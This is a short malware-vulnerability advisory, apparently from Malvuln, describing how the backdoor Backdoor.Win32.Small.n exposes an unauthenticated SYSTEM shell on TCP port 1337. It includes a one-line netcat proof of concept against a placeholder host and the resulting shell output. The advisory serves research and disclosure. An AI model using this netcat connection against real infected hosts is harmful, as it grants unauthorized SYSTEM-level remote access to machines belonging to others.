Kod:
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/fb24c3509180f463c9deaf2ee6705062.txt
Contact: [email protected]
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Small.n
Vulnerability: Unauthenticated Remote Command Execution (SYSTEM)
Description: The backdoor malware listens on TCP Port 1337, upon successful connection we get handed a remote shell from the infected host with SYSTEM integrity.
Type: PE32
MD5: fb24c3509180f463c9deaf2ee6705062
Vuln ID: MVID-2021-0167
Dropped files:
Disclosure: 04/07/2021
Exploit/PoC:
nc64.exe MALWARE_HOST_IP 1337
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\>whoami
whoami
nt authority\system
